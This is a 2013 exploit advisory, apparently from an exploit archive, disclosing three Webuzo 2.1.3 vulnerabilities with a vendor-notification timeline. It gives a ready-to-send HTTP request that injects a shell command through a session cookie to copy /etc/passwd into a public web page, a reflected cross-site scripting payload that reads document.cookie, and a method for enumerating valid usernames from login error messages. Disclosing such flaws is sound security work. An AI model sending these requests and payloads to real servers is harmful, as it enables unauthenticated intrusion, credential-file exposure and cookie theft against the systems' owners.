78 lines
No EOL
3.6 KiB
Text
78 lines
No EOL
3.6 KiB
Text
# Exploit Title: Webuzo Multiple Vulnerabilities
|
|
# Date: 7 October 2013
|
|
# Exploit Author: Mahendra
|
|
# Vendor Homepage: www.webuzo.com
|
|
# Software Link: http://downloads.webuzo.com/va.php
|
|
# Version: 2.1.3, other version might be vulnerable.
|
|
# Tested on: CentOS release 6.2 (FINAL)
|
|
# CVE : CVE-2013-6041, CVE-2013-6042, CVE-2013-6043
|
|
|
|
----------------------------------------------------
|
|
|
|
----------------------------------------------------
|
|
|
|
|
|
*Advisory details*
|
|
|
|
Webuzo 2.1.3 has been identified with multiple security vulnerabilities, which can be exploited to perform remote OS command injection, execute malicious script and enumerate users.
|
|
|
|
Authentication is not required to exploit these issues.
|
|
|
|
|
|
*Proof of Concept (PoC)*
|
|
|
|
----------------------------------------------------
|
|
Remote OS Command Injection (Webuzo) - CVE-2013-6041
|
|
----------------------------------------------------
|
|
|
|
GET /index.php?act=login HTTP/1.1
|
|
Host: xx.xx.xx.xx:2002
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Cookie: SOFTCookies7972_sid=[this is your cookie value]`cat /etc/passwd > /home/admin/public_html/pwned.html`
|
|
Connection: keep-alive
|
|
Cache-Control: max-age=0
|
|
|
|
--------------------------------------------------------------------
|
|
Reflected Cross-site scripting (File Manager module) - CVE-2013-6042
|
|
--------------------------------------------------------------------
|
|
|
|
Eventhough the user parameter is not validated properly which resulted in XSS, there are sets of security protection in place provided by vendor. There is security token which randomly generated, however the token is passed via URL and HTTPS is not enforced by default. The vendor also claims that the token is assigned only to a particular IP address which will logout the user if the token is used by another IP address.
|
|
|
|
This issue can be considered as informational or very low risk issue depending on the environment setup and method used by attacker to obtain the token.
|
|
|
|
|
|
HTTP Request : POST
|
|
Affected parameter : user
|
|
URL/page : /filemanager/login.php
|
|
Payload : 1" onmouseover=alert(document.cookie) pwned="
|
|
|
|
POST /sesseisbp4bciukbenlo/filemanager/login.php HTTP/1.1
|
|
Host: xx.xx.xx.xx:2002
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://xx.xx.xx.xx:2002/sesseisbp4bciukbenlo/filemanager/login.php
|
|
Cookie: navphp=ajax; navphp_cols=9; catforums=2; catblogs=2; catwikis=2; catcalendars=2; catgames=2; catmail=2; catpolls=2; catfiles=2; SOFTCookies7972_sid=eisbp4bciukbenlouewpgmwjlgchervf; PHPSESSID=28u75itaq1gob5it0lfb7cesg5
|
|
Connection: keep-alive
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 86
|
|
|
|
user=1"+onmouseover=alert(document.cookie)+pwned="&passwd=asd&action=Login
|
|
|
|
----------------------------------------------------
|
|
Username enumeration - CVE-2013-6043
|
|
----------------------------------------------------
|
|
1. Valid username and invalid password -> application returns “The username and password you entered is incorrect”
|
|
2. Invalid username and password -> application returns “The Webuzo username you entered is invalid"
|
|
|
|
|
|
|
|
*Advisory Timeline*
|
|
02-10-2013: Vendor notified
|
|
02-10-2013: Vendor acknowledged issues.
|
|
03-10-2013: Vendor released new version 2.1.4 - http://www.softaculous.com/board/index.php?tid=4526&title=Webuzo_2.1.4_Launched
|
|
10-10:2013: This advisory is published |